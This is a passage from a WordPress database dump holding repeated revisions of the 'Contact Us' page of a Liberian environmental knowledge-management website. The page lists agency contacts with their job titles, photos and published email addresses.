</p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 14:48:07','2021-01-18 14:48:07','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3379,42,'2021-01-22 10:24:47','2021-01-22 10:24:47','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:24:47','2021-01-22 10:24:47','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3380,42,'2021-01-22 10:24:47','2021-01-22 10:24:47','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:24:47','2021-01-22 10:24:47','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3381,42,'2021-01-22 10:24:47','2021-01-22 10:24:47','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\nManager, ESIA\nDepartment of Compliance and Enforcement\nEPA<strong>Daoda S. Carlon </strong>\n<p>Assistant Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA </br>\ncarlonbaindu@gmail.com		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 